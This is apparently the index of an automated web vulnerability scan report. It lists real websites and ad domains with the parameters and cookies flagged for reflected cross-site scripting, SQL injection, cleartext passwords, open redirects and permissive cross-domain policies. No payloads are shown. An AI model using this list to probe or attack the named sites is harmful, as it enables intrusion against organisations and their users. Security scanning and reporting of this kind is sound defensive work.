1.1. https://secure.trust-guard.com/ [__utmb cookie]
1.2. https://secure.trust-guard.com/ [__utmc cookie]
1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
1.4. https://secure.trust-guard.com/index.php [__utma cookie]
1.5. https://secure.trust-guard.com/index.php [__utmz cookie]
1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]
2.2. http://apps.sapha.com/appshandler.php [ac parameter]
2.3. http://cdn-forums.scout.com/adfeed.ashx [REST URL parameter 1]
2.4. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01 [gclid parameter]
2.5. http://dce.sapha.com/engine.php [ac parameter]
2.6. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]
2.7. http://dce.sapha.com/logging.php [ac parameter]
2.8. https://events.gsmiweb.com/subscribe.php [event_id parameter]
2.9. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]
2.10. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]
2.11. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]
2.12. http://poll.websitegear.com/compactpoll.asp [pollID parameter]
2.13. http://recruiting.scout.com/Legacy/a.z [cfg parameter]
2.14. https://secure.trust-guard.com/ [__utmb cookie]
2.15. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]
2.16. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]
2.17. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]
2.19. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
2.20. https://secure.trust-guard.com/index.php [__utmb cookie]
2.21. https://secure.trust-guard.com/index.php [__utmz cookie]
2.22. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]
2.23. https://subscribe.haymarketmedia.com/scm/ [form parameter]
2.24. http://tours.sapha.com/ [scs_sid parameter]
2.25. http://tours.sapha.com/ [scs_sid parameter]
2.26. http://tours.sapha.com/ [scs_tid parameter]
2.27. http://tours.sapha.com/ [scs_tid parameter]
2.28. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]
2.29. http://www.caribbean-ocean.com/accommodation2.php [id parameter]
2.31. http://www.caribbean-ocean.com/get-image.php [id parameter]
2.33. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]
2.34. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]
2.35. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]
2.36. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]
2.37. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]
2.38. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]
2.39. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]
2.40. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]
2.42. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]
2.43. http://www.expedia.com/pub/agent.dll [rged parameter]
2.44. http://www.expedia.com/pub/agent.dll [rgst parameter]
2.45. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]
2.46. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]
2.47. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]
2.48. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]
2.49. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]
2.50. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]
2.51. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]
2.52. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]
2.53. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]
2.54. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]
2.55. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]
2.56. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]
2.58. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]
2.59. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]
2.61. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]
2.62. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]
2.63. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]
2.64. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]
2.65. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]
2.66. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]
2.67. http://www.nutter.com/attorneys.php [AttorneyID parameter]
2.68. http://www.nutter.com/careers.php [CareerID parameter]
2.69. http://www.nutter.com/careers.php [CategoryID parameter]
2.70. http://www.scout.com/2/a.z [cfg parameter]
2.71. http://www.scout.com/a.z [c parameter]
2.72. http://www.scout.com/a.z [c parameter]
2.73. http://www.scout.com/a.z [cid parameter]
2.74. http://www.scout.com/a.z [cid parameter]
2.75. http://www.scout.com/a.z [nid parameter]
2.76. http://www.scout.com/a.z [nid parameter]
2.77. http://www.socialfollow.com/button/image/ [b parameter]
3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]
3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]
4.1. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]
4.2. http://d.xp1.ru4.com/activity [redirect parameter]
4.3. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]
5. Cross-site scripting (reflected)
5.1. http://adsfac.us/ag.asp [cc parameter]
5.2. http://apps.sapha.com/appshandler.php [ac parameter]
5.3. http://apps.sapha.com/appshandler.php [ac parameter]
5.4. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]
5.5. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]
5.6. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]
5.7. http://dce.sapha.com/engine.php [ac parameter]
5.8. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]
5.9. http://depot.activalive.com/app/deployment.php [d[] parameter]
5.10. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]
5.11. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]
5.12. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]
5.13. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]
5.14. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]
5.15. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]
5.16. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]
5.17. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]
5.18. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]
5.19. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]
5.20. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]
5.21. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]
5.22. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]
5.24. http://jlinks.industrybrains.com/jsct [ct parameter]
5.25. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
5.27. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]
5.28. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]
5.29. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]
5.30. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]
5.31. http://learn.bridgefront.com/sendpassword [button1 parameter]
5.32. http://learn.bridgefront.com/sendpassword [button2 parameter]
5.33. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]
5.34. http://learn.bridgefront.com/sendpassword [forwardpage parameter]
5.35. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]
5.36. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]
5.37. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]
5.38. http://learn.bridgefront.com/sendpassword [totalvalues parameter]
5.39. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]
5.40. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]
5.41. http://login.vindicosuite.com/default.asp [message parameter]
5.42. http://login.vindicosuite.com/default.asp [message parameter]
5.44. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
5.45. https://secure.trust-guard.com/index.php [txtEmail parameter]
5.46. https://subscribe.haymarketmedia.com/scm/ [form parameter]
5.48. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]
5.49. http://tours.sapha.com/ [scs_sid parameter]
5.50. http://tours.sapha.com/ [scs_tid parameter]
5.51. https://verify.authorize.net/anetseal/ [rurl parameter]
5.52. http://widgets.digg.com/buttons/count [url parameter]
5.53. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]
5.54. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]
5.55. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]
5.56. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]
5.57. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]
5.58. http://www.caribbean-ocean.com/accommodation2.php [id parameter]
5.60. http://www.caribbean-ocean.com/get-image.php [id parameter]
5.62. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]
5.63. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]
5.64. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]
5.65. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]
5.68. http://www.expedia.com/pub/agent.dll [date1 parameter]
5.69. https://www.expedia.com/pub/agent.dll [selc parameter]
5.70. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]
5.71. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]
5.72. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]
5.73. http://www.ezflexplan.com/navigation/menu.asp [id parameter]
5.74. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.75. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]
5.78. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.79. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]
5.81. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]
5.83. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.84. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.85. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]
5.86. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]
5.87. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]
5.88. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]
5.89. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]
5.90. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]
5.91. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]
5.92. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]
5.93. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]
5.94. http://www.nutter.com/attorneys.php [AttorneyID parameter]
5.95. http://www.nutter.com/careers.php [CareerID parameter]
5.96. http://www.nutter.com/careers.php [CategoryID parameter]
5.97. http://www.socialfollow.com/button/ [b parameter]
5.98. http://www.socialfollow.com/button/ [b parameter]
5.99. http://www.socialfollow.com/button/css/ [b parameter]
5.100. http://www.socialfollow.com/button/css/ [socialSites parameter]
5.101. http://www.socialfollow.com/login.php [tEmail parameter]
5.102. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]
5.103. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]
5.104. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]
5.105. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]
5.106. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]
5.107. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]
5.108. http://seg.sharethis.com/getSegment.php [__stid cookie]
5.109. http://support.expedia.com/app/answers/list/ [MC1 cookie]
5.111. http://www.expedia.com/default.asp [MC1 cookie]
6.1. http://a.collective-media.net/crossdomain.xml
6.2. http://a.rad.msn.com/crossdomain.xml
6.3. http://ad.doubleclick.net/crossdomain.xml
6.4. http://adsfac.us/crossdomain.xml
6.5. http://altfarm.mediaplex.com/crossdomain.xml
6.6. http://api.facebook.com/crossdomain.xml
6.7. http://apps.sapha.com/crossdomain.xml
6.8. http://as.casalemedia.com/crossdomain.xml
6.9. http://b.rad.msn.com/crossdomain.xml
6.10. http://bh.contextweb.com/crossdomain.xml
6.11. http://c.scout.com/crossdomain.xml
6.12. http://cdn-cms.scout.com/crossdomain.xml
6.13. http://cdn.eyewonder.com/crossdomain.xml
6.14. http://cdn.gigya.com/crossdomain.xml
6.15. http://clk.atdmt.com/crossdomain.xml
6.16. http://cu1.activalive.com/crossdomain.xml
6.17. http://d.xp1.ru4.com/crossdomain.xml
6.18. http://depot.activalive.com/crossdomain.xml
6.19. http://fls.doubleclick.net/crossdomain.xml
6.20. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml
6.21. http://ib.adnxs.com/crossdomain.xml
6.22. http://img.mediaplex.com/crossdomain.xml
6.23. http://img.widgets.video.s-msn.com/crossdomain.xml
6.24. http://int.teracent.net/crossdomain.xml
6.25. http://m.adnxs.com/crossdomain.xml
6.26. http://media.fastclick.net/crossdomain.xml
6.27. http://nba.scout.com/crossdomain.xml
6.28. http://ne.wac.edgecastcdn.net/crossdomain.xml
6.29. http://now.eloqua.com/crossdomain.xml
6.30. http://om.expedia.com/crossdomain.xml
6.31. http://p.addthis.com/crossdomain.xml
6.32. http://pix04.revsci.net/crossdomain.xml
6.33. http://rad.msn.com/crossdomain.xml
6.34. http://recruiting.scout.com/crossdomain.xml
6.35. http://scouthoops.scout.com/crossdomain.xml
6.36. http://search.twitter.com/crossdomain.xml
6.37. http://secure-us.imrworldwide.com/crossdomain.xml
6.38. http://segment-pixel.invitemedia.com/crossdomain.xml
6.39. http://spe.atdmt.com/crossdomain.xml
6.40. http://tags.bluekai.com/crossdomain.xml
6.41. http://tours.sapha.com/crossdomain.xml
6.42. http://va.px.invitemedia.com/crossdomain.xml
6.43. http://www.scout.com/crossdomain.xml
6.44. http://www2.sesamestats.com/crossdomain.xml
6.45. http://edge.sharethis.com/crossdomain.xml
6.46. http://expedia.com/crossdomain.xml
6.47. http://googleads.g.doubleclick.net/crossdomain.xml
6.48. http://static.ak.fbcdn.net/crossdomain.xml
6.49. http://suth.com/crossdomain.xml
6.50. http://w.sharethis.com/crossdomain.xml
6.51. http://www.advancedaccess.com/crossdomain.xml
6.52. http://www.expedia.com/crossdomain.xml
6.53. https://www.expedia.com/crossdomain.xml
6.54. http://www.facebook.com/crossdomain.xml
6.55. http://www.scmagazineus.com/crossdomain.xml
6.56. http://extras.expedia.com/crossdomain.xml
7. Silverlight cross-domain policy
7.1. http://a.rad.msn.com/clientaccesspolicy.xml
7.2. http://ad.doubleclick.net/clientaccesspolicy.xml
7.3. http://b.rad.msn.com/clientaccesspolicy.xml
7.4. http://c.scout.com/clientaccesspolicy.xml
7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml
7.6. http://clk.atdmt.com/clientaccesspolicy.xml
7.7. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml
7.8. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml
7.9. http://om.expedia.com/clientaccesspolicy.xml
7.10. http://rad.msn.com/clientaccesspolicy.xml
7.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
7.12. http://spe.atdmt.com/clientaccesspolicy.xml
7.13. http://www.gofileroom.com/clientaccesspolicy.xml
7.14. https://www.gofileroom.com/clientaccesspolicy.xml
8. Cleartext submission of password
8.1. http://hmficweb.hinghammutual.com/reglogin.aspx
8.2. http://login.vindicosuite.com/
8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
8.4. http://login.vindicosuite.com/default.asp
8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp
8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html
8.7. http://www.eneighborhoods.com/login_form.asp
8.8. http://www.gofileroom.com/lbmc/
8.10. http://www.resiteonline.com/
8.11. http://www.socialfollow.com/
8.12. http://www.socialfollow.com/
8.13. http://www.socialfollow.com/blog/
8.14. http://www.socialfollow.com/login.php
8.15. http://www.socialfollow.com/login.php
9.1. http://api.facebook.com/restserver.php [format parameter]
9.2. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]
9.3. http://cdn-forums.scout.com/adfeed.ashx [format parameter]
9.4. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]
9.5. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]
9.6. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]
9.7. http://www.expedia.com/pub/agent.dll [hfnm parameter]
9.8. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]
9.9. https://www.expedia.com/pub/agent.dll [JSESSION cookie]
9.10. https://www.expedia.com/pub/agent.dll [MC1 cookie]
9.11. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]
9.12. https://www.expedia.com/pub/agent.dll [aspp cookie]
9.13. https://www.expedia.com/pub/agent.dll [bn_u cookie]
9.14. https://www.expedia.com/pub/agent.dll [hfnm parameter]
9.15. https://www.expedia.com/pub/agent.dll [iEAPID cookie]
9.16. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]
9.17. https://www.expedia.com/pub/agent.dll [jscript cookie]
9.18. https://www.expedia.com/pub/agent.dll [p1 cookie]
9.19. https://www.expedia.com/pub/agent.dll [s1 cookie]
9.20. https://www.expedia.com/pub/agent.dll [s_sess cookie]
9.21. https://www.expedia.com/pub/agent.dll [s_vi cookie]
9.22. https://www.expedia.com/pub/agent.dll [srvys cookie]
9.23. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]
9.24. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]
10. Password returned in later response
10.1. http://www.socialfollow.com/
10.2. http://www.socialfollow.com/blog/
11. SQL statement in request parameter
11.1. https://events.gsmiweb.com/subscribe.php
11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
11.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
11.4. http://login.vindicosuite.com/default.asp
11.5. http://login.vindicosuite.com/vindico_dynamic.asp
11.6. https://secure.trust-guard.com/ResetPassword.php
11.7. https://secure.trust-guard.com/index.php
11.8. http://www.angege.com/links.php
11.9. http://www.caribbean-ocean.com/get-image.php
11.10. http://www.scout.com/2/a.z
11.11. http://www.scout.com/a.z
11.12. http://www.socialfollow.com/button/image/
12. SSL cookie without secure flag set
12.1. https://broker.gotoassist.com/h/lbmc
12.2. https://events.gsmiweb.com/subscribe.php
12.3. https://secure.opinionlab.com/ccc01/comment_card.asp
12.4. https://secure.trust-guard.com/
12.5. https://secure.trust-guard.com/ResetPassword.php
12.6. https://secure.trust-guard.com/index.php
12.7. https://subscribe.haymarketmedia.com/scm/
12.8. https://support.trust-guard.com/visitor/index.php
12.9. https://www.clone-systems.com/ecommerce/index.php
12.10. https://www.clone-systems.com/stylesheet.php
12.11. https://www.taxnotebook.com/Login/PopupMessage.aspx
12.12. https://www.taxnotebook.com/Login/TNLogin.aspx
12.13. https://www.taxnotebook.com/tnstart.asp
12.14. https://www.trpc401k.com/
12.15. https://www.expedia.com/pub/agent.dll
12.16. https://www.gofileroom.com/lbmc
12.17. https://www.paypal.com/en_US/i/btn/btn_xpressCheckout.gif
13.1. http://ads.adonion.com/serving/showbanner.php
13.2. http://bh.contextweb.com/bh/set.aspx
13.3. https://broker.gotoassist.com/ds/queryPost.flow
13.4. https://broker.gotoassist.com/javaScriptTester.tmpl
13.5. http://fls.doubleclick.net/activityi
13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr
13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr
13.8. http://l.sharethis.com/pview
13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr
13.10. http://sales.liveperson.net/hc/56727252/
13.11. https://support.trust-guard.com/visitor/index.php
13.12. http://www.facebook.com/extern/login_status.php
13.13. http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
14.1. https://secure.opinionlab.com/
14.2. https://www.clone-systems.com/
14.3. https://broker.gotoassist.com/
14.4. https://events.gsmiweb.com/
14.5. https://mosaicsecurity.com/
14.6. https://portal.lbmc.net/
14.7. https://seal.networksolutions.com/
14.8. https://seals.networksolutions.com/
14.9. https://secure.trust-guard.com/
14.10. https://ssl.google-analytics.com/
14.11. https://subscribe.haymarketmedia.com/
14.12. https://support.trust-guard.com/
14.13. https://verify.authorize.net/
14.14. https://www.expedia.com/
14.15. https://www.fiddler2.com/
14.16. https://www.gofileroom.com/
14.17. https://www.google.com/
14.18. https://www.mavitunasecurity.com/
14.19. https://www.paypal.com/
14.20. https://www.taxnotebook.com/
14.21. https://www.trpc401k.com/
14.22. https://www.trust-guard.com/
15. ASP.NET ViewState without MAC enabled
15.2. http://recruiting.scout.com/Legacy/a.z
15.3. https://subscribe.haymarketmedia.com/scm/
15.4. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx
15.6. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z
15.7. http://www.scout.com/2/a.z
15.8. http://www.scout.com/Legacy/a.z
15.9. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z
15.10. http://www.scout.com/PictureGallery.aspx
15.11. http://www.scout.com/a.z
15.12. http://www.scout.com/search.aspx
15.13. https://www.taxnotebook.com/Login/ChangePwd.aspx
15.14. https://www.taxnotebook.com/Login/PopupMessage.aspx
15.15. https://www.taxnotebook.com/Login/TNLogin.aspx
16.1. http://a.triggit.com/pxbk [redir parameter]
16.2. http://b.scorecardresearch.com/r [d.c parameter]
16.3. http://d.xp1.ru4.com/activity [redirect parameter]
17. Cookie scoped to parent domain
17.1. http://api.twitter.com/1/statuses/user_timeline.json
17.2. http://www.clone-systems.com/ecommerce/
17.3. http://www.clone-systems.com/ecommerce/index.php
17.4. https://www.clone-systems.com/ecommerce/index.php
17.5. http://www.expedia.com/Hotels
17.6. http://www.lbmc.com/about_us
17.8. http://ads.adonion.com/serving/tracking_id.php
17.9. http://ak1.abmr.net/is/media.expedia.com
17.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0
17.11. http://as.casalemedia.com/j
17.12. http://b.scorecardresearch.com/b
17.13. http://b.scorecardresearch.com/r
17.14. http://bh.contextweb.com/bh/set.aspx
17.15. http://cf.addthis.com/red/p.json
17.16. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01
17.17. http://dce.sapha.com/logging.php
17.18. http://dce.sapha.com/logging.php
17.19. http://ib.adnxs.com/pxj
17.20. http://ib.adnxs.com/seg
17.21. http://id.google.com/verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif
17.22. http://id.google.com/verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif
17.23. http://image.providesupport.com/js/advancedaccess/safe-monitor.js
17.24. http://image.providesupport.com/js/charlesw/safe-standard.js
17.25. http://int.teracent.net/tase/int
17.26. http://leadback.advertising.com/adcedge/lb
17.27. http://m.adnxs.com/msftcookiehandler
17.28. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif
17.30. http://media.fastclick.net/w/tre
17.31. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491
17.32. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.33. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.34. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.35. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
17.36. http://pixel.quantserve.com/pixel
17.37. http://pts.eyewonder.com/ewr
17.38. http://segment-pixel.invitemedia.com/pixel
17.39. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543557/sid.6543598/sid.6543551
17.40. http://serw.clicksor.com/newServing/tracking_id.php
17.41. http://sync.mathtag.com/sync/img
17.42. http://tags.bluekai.com/site/2576
17.43. http://tags.bluekai.com/site/2751
17.44. http://tags.bluekai.com/site/2753
17.45. http://tags.bluekai.com/site/2948
17.46. http://track.websiteceo.com/m/
17.47. http://va.px.invitemedia.com/pixel
17.48. http://www.bizographics.com/collect/
17.49. http://www.compliancepoint.com/sub_serv_isc_pci.asp
17.50. http://www.expedia.com/default.asp
17.51. http://www.expedia.com/pub/agent.dll
17.52. https://www.expedia.com/pub/agent.dll
17.53. http://www.facebook.com/SocialFollow
17.54. http://www.linkedin.com/pub/12/7a2/294
17.55. http://www.linkedin.com/pub/social-follow/12/7a2/294
17.56. http://www.myroitracking.com/newServing/tracking_id.php
18. Cookie without HttpOnly flag set
18.1. https://broker.gotoassist.com/h/lbmc
18.2. http://dominionenterprises.com/
18.3. https://events.gsmiweb.com/subscribe.php
18.4. http://hmficweb.hinghammutual.com/billing_view/
18.5. http://hmficweb.hinghammutual.com/billing_view/billingview.asp
18.6. http://learn.bridgefront.com/sendpassword
18.7. http://login.vindicosuite.com/
18.8. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
18.9. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
18.10. http://login.vindicosuite.com/default.asp
18.11. http://login.vindicosuite.com/vindico_dynamic.asp
18.12. http://poll.websitegear.com/compactpoll.asp
18.13. http://poll.websitegear.com/compactpoll.asp
18.14. http://sales.liveperson.net/visitor/addons/deploy.asp
18.15. https://secure.opinionlab.com/ccc01/comment_card.asp
18.16. https://secure.trust-guard.com/
18.17. https://secure.trust-guard.com/ResetPassword.php
18.18. https://secure.trust-guard.com/index.php
18.19. http://support.expedia.com/app/answers/list/
18.21. http://support.expedia.com/ci/ajaxRequest/getReportData
18.22. https://support.trust-guard.com/visitor/index.php
18.23. http://t2.trackalyzer.com/trackalyze.asp
18.24. http://t3.trackalyzer.com/trackalyze.asp
18.25. http://tbe.taleo.net/NA9/ats/careers/jobSearch.jsp
18.26. http://visible.me/search/social/follow/2563692
18.27. http://www.advancedaccess.com/swf/swfobject.js
18.28. http://www.advisorsquare.com/advdev/calculators/content.asp
18.29. http://www.advisorsquare.com/design_gallery/Flash/BB12_bg.gif
18.30. http://www.advisorsquare.com/design_gallery/Flash/BU13Flash_banner_background.gif
18.31. http://www.advisorsquare.com/design_gallery/Flash/BU14Flash_banner_background.gif
18.32. http://www.advisorsquare.com/design_gallery/Flash/BUP18Flash_banner_background.gif
18.33. http://www.advisorsquare.com/design_gallery/Flash/CS15Flash_banner_background.gif
18.34. http://www.advisorsquare.com/design_gallery/Flash/CS18_bg.gif
18.35. http://www.advisorsquare.com/design_gallery/Flash/CS20_bg.gif
18.36. http://www.advisorsquare.com/design_gallery/Flash/GA14_bg.gif
18.37. http://www.advisorsquare.com/design_gallery/Flash/GA15_bg.gif
18.38. http://www.advisorsquare.com/design_gallery/Flash/NL12_bg.gif
18.39. http://www.advisorsquare.com/design_gallery/fsplash/background.gif
18.40. http://www.advisorsquare.com/design_gallery/limited/SE3_background.gif
18.41. http://www.advisorsquare.com/design_gallery/welcome/grayStripe.gif
18.42. http://www.advisorsquare.com/design_gallery/welcome/transpx.gif
18.43. http://www.advisorsquare.com/images/business.gif
18.44. http://www.advisorsquare.com/images/business_over.gif
18.45. http://www.advisorsquare.com/images/individual.gif
18.46. http://www.advisorsquare.com/images/individual_over.gif
18.47. http://www.advisorsquare.com/images/view1.gif
18.48. http://www.advisorsquare.com/images/view_over1.gif
18.49. http://www.advisorsquare.com/new/BrochureLevel/transPx.gif
18.50. http://www.advisorsquare.com/new/BusinessLevel/FA09BannerBG.jpg
18.51. http://www.advisorsquare.com/new/BusinessLevel/grayStripe.gif
18.52. http://www.advisorsquare.com/new/BusinessLevel/transPx.gif
18.53. http://www.advisorsquare.com/new/asframeless02/content.asp
18.54. http://www.advisorsquare.com/new/asle04/content.asp
18.55. http://www.advisorsquare.com/new/asle04/grayStripe.gif
18.56. http://www.advisorsquare.com/new/asle04/staff_pict1.jpg
18.57. http://www.advisorsquare.com/new/asle04/staff_pict2.jpg
18.58. http://www.advisorsquare.com/new/asle05/content.asp
18.59. http://www.advisorsquare.com/new/asle05/transPx.gif
18.60. http://www.advisorsquare.com/new/css/menu.css
18.61. http://www.advisorsquare.com/new/images/banner_slogan1.jpg
18.62. http://www.advisorsquare.com/new/images/content_bg_repeat.jpg
18.63. http://www.advisorsquare.com/new/js/jquery-1.4.4.min.js.txt
18.64. http://www.advisorsquare.com/new/js/menu.js.txt
18.65. http://www.advisorsquare.com/new/js/preload.js.txt
18.66. http://www.advisorsquare.com/research/content.asp
